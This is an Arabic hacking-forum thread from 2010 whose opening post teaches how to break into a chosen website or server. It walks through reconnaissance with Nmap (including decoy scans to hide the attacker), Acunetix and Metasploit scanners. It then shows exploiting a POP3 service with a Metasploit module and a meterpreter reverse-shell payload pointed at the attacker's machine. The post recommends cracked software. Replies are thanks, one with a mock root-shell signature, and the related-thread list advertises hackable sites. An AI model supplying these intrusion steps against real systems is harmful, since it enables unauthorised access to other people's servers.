التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-10-2010, 06:23 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي حصريا:شرح الاستهداف بالاختراق المتقدم


السلام عليكم ورحمة الله وبركاتة
كيف حال الشباب الطيبة ان شاء الله تكون بألف خير
اعرف طولت عليكم بالمواضيع لكن الظروف والانشغلات . والله لا يشغلنا عن ذكره
اليوم رح اضع بطريقة مبسطة وسهلة وواضحة عملية استهداف عن طريق الاختراق المتقدم
الخطوات اللازمة للأستهداف
1-تحديد الهدف المراد اختراقه0
2-فحص الهدف0
3-البحث عن ثغرات مناسبه لعملية الاختراق0
4-استغلال الثغرة(سواء بالترجمة او بالميتا)0
--------------------
نبدأ بأسم الله الرحمن الرحيم
اول نقطة
تحديد الهدف المراد اختراقه
اظن هذه الطريقة سهلة وهي الاساس . تحدد الموقع او الجهاز الذي تريد اختراقه وبامكانك تستخرج البورت بالأمر
start >>run>>cmd>>>ping www.xxx.com
www.xxx.com رابط الموقع
#############
فحص الهدف
هنا ناتي في الخطوة الثانية وهي عملية فحص الهدف المراد اختراقه
1- بأمكانك تستعمل اداة الفحص Acunetix
2-بأمكانك استخدام اداة NET TOOLS
3-بأمكانك استخدام استخدام اداة Nmap <<يفضل استخدامه
4-بأمكانك استخدام اداة auxiliary المدرجة مع الميتاسبلويت
5-في النهاية بأمكانك استخدام برامج اخرى تعرفها وتستخدمها انت كبرنامج ip scaner او غيرها هذا يرجع لك في الاستخدام لها
______________
نبدأ بشرح ستخدام اول اداة acunetix
التحميل
هنــأ
واذا كان يحتاج كراك فانه متوافر بالنت بكثرة
شرح الاداة


اظن الشرح واضح ومفهوم وايضا يستخرج لك الثغرات xss
واي شيء او الغاز غير مفهومة ارجوا عدم التردد في السؤال
_________________
الاداة التانية وهي اداة NET TOOLS التي لا غنى عنها والمعروفة لدينا وتستخدم اكثر شيء في فحص الشبكات
التحميل
هنــأ
شرح بسيط لها :



_________________
الحين نأتي الى اهم اداه وهي اداة Nmap والتي شخصيا افضلها واستعملها بأستمرار لما تحتويه من اوامر قوية ودقيقة الفحص وسرعة ايضا في الفحص واكتشف نوع النظام
نأتي لشرح هذه الاداة بأختصار
التحميل
هنــا
الشرح
من ناحية الشرح لن ينتهي ولكن سأضع شرح لأمر واحد وهو بالتالي نفس الروتين للاوامر الباقية فقط يختلف اكمن حرف بالامر
الشرح لفحص الموقع من ناحية اكتشاف البورت والاسم والاصدار والنظام





الاوامر الاكثر انتشارا واستخدام
nmap -P0 www.site.com اكتشاف البورتات المفتوحة
nmap -sV www.site.com الكشف عن البورتات المفتوحه +اصدار النظام +اسم البرنامج المركب
nmap -sS www.site.com في حال لم ينجح الامر السابق ^_^ نستخدم هذا الامر
nmap -sS -F 192.168.0.1-255 يستخدم في حال فحص شبكة كامل ويظهر فقط البورتات الاكثر شهرة وانتشارا
nmap -sS -D 192.168.0.2, 192.168.0.3, 192.168.0.4 192.168.0.1 للأختفاء اثناء الفحص
nmap -sS -A -p 80 192.168.0.1 تحديد النظام وجمع المعلومات ع المنفذ 80
nmap -sS -p 1-100 127.0.0.1 البحث في الايبيهات المحصورة بين 1 و 100

*ملاحظة: استبدل www.site.com بآي بي الموقع او رابط الموقع وايضا بالنسبة للـ192.168.0.1 استبدله بالرابط او الاي بي سواء للاجهزة وبأمكانك تستخدمه للمواقع
وفي النهاية بأمكانك استخدام الواجهة الرسومية zenmap في عملية الفحص


______________________
الآن نأتي الى اداة auxiliary ولها اكثر من امر كما تعلمون
نفتح الميتاسبلويت من الويب Start>>programs>>metasploit3>>Web Console
وانتظر لحظات ورح يفتح معك من الويب على هذا الرابط http://127.0.0.1:55555
الحين نأتي للكونسول من فوق console ونضغط عليها
رح تفتح الشاشة
نضع الامر
use scanner/portscan/tcp تعني استخدام الثغرة (اي نوع الفحص)
ثم
set RHOSTS 64.202.189.170 لتحديد الهدف المراد فحصه من البورتات 64.202.189.170 وبأمكانك وضع اي بي المراد فحصه سواء مواقع او اجهزة
ثم خيار PORTS لتحديد نطاق البحث
set PORTS 1-60000 وبامكانك تختار اي نطاق تريد
حتى لو كنت تريد التاكد من ان بورت الاف تي بي فتوح اختار النطاق من 1 الى 21 بالأمر
set PORTS 1-21
وباقي الخيارات غير مهمة
وبعدها ضع الامر run من اجل البدأ في الفحص ورح تظهر لك البورتات المفتوحة دون الاصدار كما في الان ماب
يعني في النهاية استخدام الان ماب افضل شيء لك
_______________
والاداة الخامسة هي الادوات المتواجدة عندك والتي تستخدمها انت وتفضلها

################

الآن نأتي للخطوة الثالثة والرابع مع بعض: وهي خطوة البحث عن الثغرة المناسبة للأستغلال بعد عمليات الفحص التي قمنا بها والاستغلال
يوجد هنا ادوات جاهزة كمشروع الميتاسبلويت يوجد به العديد من الثغرات الجاهزة التي تمكنك من الاختراق
وفي حال عدم تواجدها في الميتاسبلويت بأمكانك الفحص في مواقع السكيورتي كالميلوورم او exploit-db.com البديل للميلوورم بعد توقفه او سكيورتيب فوكس او او او كلا حسب ما يفضله ويناسبه 0
من ناحية الميتاسبلويت نشرحه بطريقة سهلة وواضحه
لنفرض انك في عملية الفحص في السابق وجدت البورت 110 الخاص بمنفذ pop3
وكما تعلمون يوجد له ثغرة بالميتاسبلويت
استغلالها كالتالي .
مثال::
في الميتاسبلويت الكونسول ضع الامر search pop3
ورح يظهر لك الاستغلالها المتوفرة
اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا
use linux/pop3/cyrus_pop3d_popsubfolders
ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم
عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت
البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ 110 مفتوح
نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر
set RHOST 64.202.189.170
ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5 اي بي جهاز المهاجم
set LPORT 4444 بورت مفتوح في جهاز المهاجم
ومن ثم امر الاستغلال exploit
لكن في الثغرة يجب توافر نفس المتطلبات
وايضا الكيرنل مع البرنامج
Gentoo 2006.0 Linux 2.6 مع االبرنامج يعني يمكن هذه قديمة وما تنجح يوجد افضل منها فقط انت وبحثك

مجرد مثال للتوضيح


__
وفي الامكان ايضا استخدام مواقع السكيورتي في الفحص كما ذكرنا وطريقة الترجمة متوافرة بالنت وشروحات كثيرة لها واي استفسار من هذه الناحية ايضا انا موجود لا تتردد فقط.

###########################
*ملاحظات ومشاكل قد تواجهك في عمليات الاختراق
1. عند استهداف موقع ما يجب ان تعرف معلومات الموقع كاملة كنظام تشغيل وبورتات مفتوحة واالسكربتات المتواجدة من اجل نجاح عملية الاستهداف
2. عند عدم نجاح اي ثغرة كانت هذا لا يعني انه لا تتوافر ثغرات بالموقع او انه عملية الاختراق المتقدم غير قعالة وناجحة للأختراق وانما ذلك يرجع الى عدم توافر المتطلبات المناسبة كـ النظام يختلف عدم تواجد البورت او عدم تناسق الاصدار او البورت او البرنامج الركاب مع الثغرة
او حجب الاي بي بتاعك اثناء عملية الفحص مما يؤدي الى عدم عمليات الرد اثناء الفحص او اظهار نتائج خاطئة او عدم اظهار نتائج اصلا بسبب حماية السيرفر مما يؤدي الى فقدان الامل
وهذا خطا وانما حاول باكثر من طريقة واداة او اسال وستجد ضالتك
اذا لم تجد استغلال مناسب فأكتشف انت استغلال واصنعه <<< بالنسبة لي ولكم لا احد يستطيع هذا لكن مع الدورات والتعلم البفر رح تعرف بأذن الله
يفضل يكون الشخص ملم ببعض البرمجيات من اجل فهم الثغرة وفهم عملية استغلالها كأتقان لغة php , html , perl , python , c++ , C
هذه افضل لفات البرمجة بالنسبة للمخترق او البنتشريشن تيست بالاضافة الى باقي الاناوع لكن هذه الاساس
###########
من ناحية الاستفسارات
ما رح اقصر بأذن الله فقط مجرد مبادرة منك بطرح الاستفسار وسيت الاجابة عليه سواء من قبلي او من قبل غيري
والاعضاء ما يقصرون
اي شء خطء في الشرح ارجوا تنبيهي
####
تحياتي
لا للاحتكار
المجهوول




pwvdh:avp hghsji]ht fhghojvhr hgljr]l


التعديل الأخير تم بواسطة المجهووول ; 07-10-2010 الساعة 06:27 PM.

   

رد مع اقتباس
قديم 07-10-2010, 06:52 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية hitman-zone
 

 

 
إحصائية العضو





hitman-zone غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitman-zone is on a distinguished road

افتراضي


thanks

   

رد مع اقتباس
قديم 07-10-2010, 07:21 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية z3r0 b0mb3r
 

 

 
إحصائية العضو







z3r0 b0mb3r غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
z3r0 b0mb3r is on a distinguished road

افتراضي


شكرا لك اخي موضوع مميز

   

رد مع اقتباس
قديم 07-10-2010, 07:23 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية DaRk DrEaM
 

 

 
إحصائية العضو






DaRk DrEaM غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DaRk DrEaM is on a distinguished road

افتراضي


مشكور يا بطل

   

رد مع اقتباس
قديم 07-10-2010, 11:02 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية GAZA-HacK
 

 

 
إحصائية العضو





GAZA-HacK غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
GAZA-HacK is on a distinguished road

افتراضي


يعطيك العافيه اخويـ الموضوع المميز والشرح المميز وانت اروع كمان


واحلى تقيم 5/5

سلام

   

رد مع اقتباس
قديم 07-11-2010, 10:09 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


مشكورين يا اخوان على المرور الطيب بس نسيتو تردو السلام :D
واهلا وسهلا بالشباب الطيبة
والسلام عليكم

   

رد مع اقتباس
قديم 07-11-2010, 11:06 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


وعليكم السلام ورحمه الله وبركاته

بارك الله فيك يا غالي

واصل يا مبدع

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 07-11-2010, 12:03 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية DannY.IraQi
 

 

 
إحصائية العضو







DannY.IraQi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DannY.IraQi is on a distinguished road

افتراضي


تسلم ياوحش @!

بس لو كان الشرح فديو بيكون أفضل


See U

التوقيع

 

   

رد مع اقتباس
قديم 07-11-2010, 12:55 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


اهلين بالشباب
قريبا فيديو ان شاء الله لكن يمكن يكون درس آخر لكن شبيه باذن الله
تحياتي
المجهوول

   

رد مع اقتباس
قديم 07-11-2010, 04:29 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
El3ctr0-Dz
.:IronMind:.
 
الصورة الرمزية El3ctr0-Dz
 

 

 
إحصائية العضو








El3ctr0-Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى El3ctr0-Dz إرسال رسالة عبر Skype إلى El3ctr0-Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
El3ctr0-Dz is on a distinguished road

افتراضي


و عليكم السلام و رحة الله تعالى و بركاته
شكرا لك بارك الله فيك
ابداع و تميز

التوقيع

======================================
[+] Human Error Detected : Auto payload in progress
[+] Generating payload
[+] Sending evil packet
[+] Reverse shell initiated from 68.82.4.9
[+] id=0(root) gid=0(root) groups=0(root)
======================================
P4L 4 Ev3r

qib@hotmail.com

 

   

رد مع اقتباس
قديم 08-02-2010, 01:28 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


حياك الله يا مجهول محترف بكل معنى الكلمة

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 08-02-2010, 04:54 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية XxTQxX
 

 

 
إحصائية العضو








XxTQxX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
XxTQxX is on a distinguished road

افتراضي


[align=center]
وعليكم السلام ورحمه الله وبركاته

شكرا لك اخي موضوع مميز[/align]

   

رد مع اقتباس
قديم 08-12-2010, 11:42 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو








cisco_security غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
cisco_security is on a distinguished road

افتراضي


شكرا لك يا غالي

التوقيع

OFF Line

My be will return one day

Inchalah

 

   

رد مع اقتباس
قديم 08-31-2010, 05:08 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية bt4
 

 

 
إحصائية العضو







bt4 غير متواجد حالياً

إرسال رسالة عبر MSN إلى bt4

 

 

إحصائية الترشيح

عدد النقاط : 10
bt4 is on a distinguished road

افتراضي


مشكوررررررررررررررررررررررررررررررررر

   

رد مع اقتباس
قديم 09-05-2010, 12:41 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو





آدم الكندي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
آدم الكندي is on a distinguished road

افتراضي


الله عليك
شرح رائع

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
اساسيات الاستهداف من الاستهداف حتى رفع الشل وتعليق الاندكس على منتدى KaLa$nikoV قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 22 06-26-2017 05:32 PM
سارعـــو بالاختراق هدية مني ليكم مواقــــع مصابة SQL 1nj3ct!on IVIr-I-Iaker قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 27 08-17-2010 07:36 PM
سارعـــو بالاختراق هدية مني ليكم موقع التنمية الاقتصادية الإيطالية MUSLIM قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 05-01-2010 02:10 PM


الساعة الآن 09:42 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0